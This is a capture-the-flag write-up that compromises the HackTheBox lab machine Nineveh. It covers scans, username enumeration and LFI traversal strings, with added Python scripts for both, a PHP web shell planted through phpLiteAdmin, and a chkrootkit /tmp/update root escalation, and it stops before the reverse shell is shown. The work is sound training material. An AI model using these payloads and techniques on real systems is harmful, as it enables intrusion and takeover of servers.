┌──(kali㉿kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.10.43
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
443/tcp open ssl/http Apache httpd 2.4.18 ((Ubuntu))
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=nineveh.htb/organizationName=HackTheBox Ltd/stateOrProvinceName=Athens/countryName=GR
| Not valid before: 2017-07-01T15:03:30
|_Not valid after: 2018-07-01T15:03:30
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
| tls-alpn:
|_ http/1.1
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sU -O 10.10.10.43
All 1000 scanned ports on 10.10.10.43 (10.10.10.43) are in ignored states.
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sC -sV -p- 10.10.10.43
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
| ssl-cert: Subject: commonName=nineveh.htb/organizationName=HackTheBox Ltd/stateOrProvinceName=Athens/countryName=GR
| Not valid before: 2017-07-01T15:03:30
|_Not valid after: 2018-07-01T15:03:30
|_ssl-date: TLS randomness does not represent time
|_http-title: 400 Bad Request
| tls-alpn:
|_ http/1.1
nmap shows only HTTP (TCP 80) and HTTPS (TCP 443) open, so the two web servers are the whole attack surface. Running nikto against port 80:
┌──(kali㉿kali)-[~]
└─$ nikto -h http://10.10.10.43
+ Server: Apache/2.4.18 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Server may leak inodes via ETags, header found with file /, inode: b2, size: 5535e4e04002a, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ OPTIONS: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS .
+ /info.php: Output from the phpinfo() function was found.
+ /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information. See: CWE-552
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /info.php?file=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8046 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time: 2023-12-29 22:56:25 (GMT-5) (2435 seconds)
I tried some basic password guessing against the login form and noticed that the error messages reveal whether a username exists. For example, when I tried admin:
Invalid Password!
When I tried nineveh:
invalid username
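The two different messages are a classic username-enumeration oracle: the form tells you which half of the credential was wrong, so a wordlist of usernames can be confirmed without knowing any password. The script below is an added example, not part of the original write-up. The two error strings are the ones observed above; the login URL, the form field names (username/password) and the candidate names are assumptions, and the transport is injected so the oracle logic can be exercised offline against a constructed stand-in.

```python
"""Username enumeration through differential login error messages.

Added example (not from the original write-up). The error strings are the
ones the login form returned; LOGIN_URL and the form field names are assumed.
"""
import urllib.parse
import urllib.request
from typing import Callable, Dict, Iterable

# Exact strings returned by the login form (observed on the target).
BAD_PASSWORD = "Invalid Password!"   # username exists, password wrong
BAD_USERNAME = "invalid username"    # username does not exist

# Assumed endpoint; replace with the real login page.
LOGIN_URL = "http://10.10.10.43/LOGIN-PAGE-HERE"


def classify_login_response(body: str) -> str:
    """Map a login response body to an oracle verdict.

    Returns 'exists', 'absent' or 'unknown'. Matching is case-insensitive so
    the inconsistent casing of the two messages does not matter.
    """
    lowered = body.lower()
    if BAD_PASSWORD.lower() in lowered:
        return "exists"
    if BAD_USERNAME.lower() in lowered:
        return "absent"
    return "unknown"


def enumerate_users(candidates: Iterable[str],
                    attempt: Callable[[str, str], str],
                    password: str = "notthepassword") -> Dict[str, str]:
    """Try every candidate with a throwaway password and record the verdict.

    `attempt(username, password)` performs one login and returns the response
    body. Injecting it keeps the oracle logic testable without a target.
    """
    return {user: classify_login_response(attempt(user, password))
            for user in candidates}


def http_attempt_factory(url: str) -> Callable[[str, str], str]:
    """Build a live `attempt` that POSTs assumed field names to `url`."""
    def attempt(username: str, password: str) -> str:
        data = urllib.parse.urlencode({"username": username,
                                       "password": password}).encode()
        req = urllib.request.Request(url, data=data, method="POST")
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.read().decode(errors="replace")
    return attempt


def fake_attempt(username: str, password: str) -> str:
    """Constructed offline stand-in that behaves like the target: only 'admin' exists."""
    return BAD_PASSWORD if username == "admin" else BAD_USERNAME


if __name__ == "__main__":
    # Offline run against the stand-in; swap in http_attempt_factory(LOGIN_URL)
    # and a real wordlist to run against the target.
    for user, verdict in enumerate_users(["admin", "nineveh", "amrois"],
                                         fake_attempt).items():
        print(f"{user:10s} {verdict}")
```

The fix on the server side is the mirror image: return one generic message for both failure cases and keep response time and status code identical.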
Enumeration: Website - TCP 443
The page is the same whether visited by IP address or as nineveh.htb.
phpLiteAdmin is a PHP interface for interacting with SQLite databases. The version here is 1.9, for which searchsploit lists several exploits:
https://www.phpliteadmin.org/
Examining each of these with searchsploit -x [path], the first is a version match and seems like a good way to get execution. The second also looks like it should work, if I want to do SQLi. The third one is not a version match, and the fourth has a bunch of less interesting vulnerabilities like XSS and CSRF. For all of them, I need to authenticate first.
Have you fixed the login page yet! hardcoded username and password is really bad idea!
check your serect folder to get in! figure it out! this is your challenge
Improve the db interface.
~amrois
None of it makes much sense at this point. The note does mention a secret folder; maybe we'll find it while enumerating port 443. One thing to notice is that the URL that generates the page looks like a file path. When a parameter looks like a file path, the first thing to test is local file inclusion (LFI). I tried, and it didn't exactly work. When I submit the following string
../../../../../../../etc/passwd
I'm back at the 'No Note is selected' message. That suggests the include is still reachable but guarded by a backend check that requires the string 'ninevehNotes' somewhere in the path: any request without it falls through to that message instead of an include error. According to the error, we're in the /www/html/department/ directory, so we need to go three directories above. Let's try with this string.
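What is described above (a traversal rejected when the token is missing, accepted when it is present) is exactly how a substring check looks from the outside, and a substring check says nothing about where the resolved path ends up. The site's PHP source is not on this page, so the following is an added Python model, not the real code: the 'must contain ninevehNotes' check beside a check that resolves the path and confines it to the notes directory. The directory layout and the token-bearing traversal string are constructed for the demonstration.

```python
"""Why a 'must contain ninevehNotes' check does not stop path traversal.

Added example, not the site's source: a Python model of the check the
write-up infers, next to a check that resolves the path first.
"""
import os
import tempfile

REQUIRED_TOKEN = "ninevehNotes"   # the substring the backend appears to require


def vulnerable_allows(user_path: str) -> bool:
    """Model of the observed filter: include whenever the token is present.

    Requests without the token fall through to 'No Note is selected'; requests
    with it are included regardless of any '..' segments around the token.
    """
    return REQUIRED_TOKEN in user_path


def hardened_resolve(notes_dir: str, user_path: str):
    """Resolve the request and accept it only if it stays inside notes_dir.

    realpath collapses '..' segments and follows symlinks, so the comparison is
    made on where the file really is, not on what the string contains. An
    absolute user_path replaces the base in os.path.join and is rejected too.
    Returns the path to include, or None to reject.
    """
    base = os.path.realpath(notes_dir)
    target = os.path.realpath(os.path.join(base, user_path))
    if os.path.commonpath([base, target]) != base:
        return None
    return target


def demo():
    """Run both checks over constructed inputs in a throwaway notes directory.

    Returns {case: (vulnerable_allows, hardened_allows)}.
    """
    with tempfile.TemporaryDirectory() as root:
        notes_dir = os.path.join(root, "www", "html", "department", "files")
        os.makedirs(notes_dir)
        with open(os.path.join(notes_dir, "ninevehNotes.txt"), "w") as fh:
            fh.write("constructed note\n")

        cases = {
            # a legitimate note: both checks accept it
            "legit": "ninevehNotes.txt",
            # the write-up's traversal string: no token, so even the weak
            # filter rejects it (the 'No Note is selected' behaviour)
            "plain_traversal": "../../../../../../../etc/passwd",
            # constructed: token present, yet the path escapes the directory
            "token_traversal": "ninevehNotes/../../../../../etc/passwd",
        }
        return {name: (vulnerable_allows(path),
                       hardened_resolve(notes_dir, path) is not None)
                for name, path in cases.items()}


if __name__ == "__main__":
    for name, (weak, strong) in demo().items():
        print(f"{name:16s} substring-filter={weak!s:5s} realpath-check={strong}")
```

The hardened variant is what a code fix for the department page should look like in PHP as well: `realpath()` the joined path and compare the prefix, rather than searching for a marker string.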
When it comes to LFIs, you usually need to chain them with another vulnerability to get remote code execution. Therefore, I'm going to start enumerating the next port to see if I can find another vulnerability to chain this one to.
View the page source to see if it gives any extra information. We don't get anything useful. Next, view the SSL certificate.
admin@nineveh.htb
/secure_notes
This might be what the comment 'check your secret folder' was referring to. Save the image; it might have a secret stored in it. We'll look into that later.
https://nineveh.htb/secure_notes/
I tried the default password 'admin' for phpLiteAdmin v1.9, but that did not work. Let's try brute-forcing the password. First, intercept the request in Burp.
Let's view the content of the Remote PHP Code Injection exploit. According to the comments in the exploit, an attacker can create a SQLite database whose filename ends in .php and insert PHP code as text fields. Once the database exists, the attacker executes the code simply by requesting the database file in the browser, provided the file sits somewhere PHP will serve or include it.
This is exactly the primitive I was hoping to find: phpLiteAdmin lets me drop a file containing PHP onto the server, and the LFI found earlier lets me include that file so PHP executes it.
In the Create New Database section, create a new database called random.php. Then click on random.php in the Change Database section. There, create a new table called random with 1 field. In the Field parameter add the following code and change the Type to TEXT.
<?php echo system($_REQUEST["cmd"]); ?>
Click Create. phpLiteAdmin reports the location of the new database: it is created under /var/tmp.
Now, let's go back to the LFI vulnerability and execute our PHP code.
We're running as www-data, so we don't have the rights to read the file. We need to escalate our privileges.
Priv: www-data -> root
Let's transfer the LinEnum script from our attack machine to the target. On the attack machine, start a web server in the directory that holds the script.
In our nmap scan, port 22 was not reported open; however, LinEnum shows SSH listening on localhost, which is why the external scan missed it. I'm not sure what to do with that yet, but I'll keep it in mind in case I don't find another way to escalate privileges.
Next, let's try pspy. If you don't have the tool, you can download it from the following GitHub repository.
Every minute or so chkrootkit is being run. I had never seen that on a machine before, so I googled it and found that it is a program intended to help system administrators check their systems for known rootkits. Next, I googled 'chkrootkit privilege escalation' and landed on this
There is a privilege escalation vulnerability in old versions of this software: when chkrootkit runs as root, it will execute any file named /tmp/update. Therefore, all we have to do is create an 'update' file containing a reverse shell and wait for the scheduled task to hand us a shell with root privileges.
I'll write a simple reverse shell to /tmp/update and make it executable: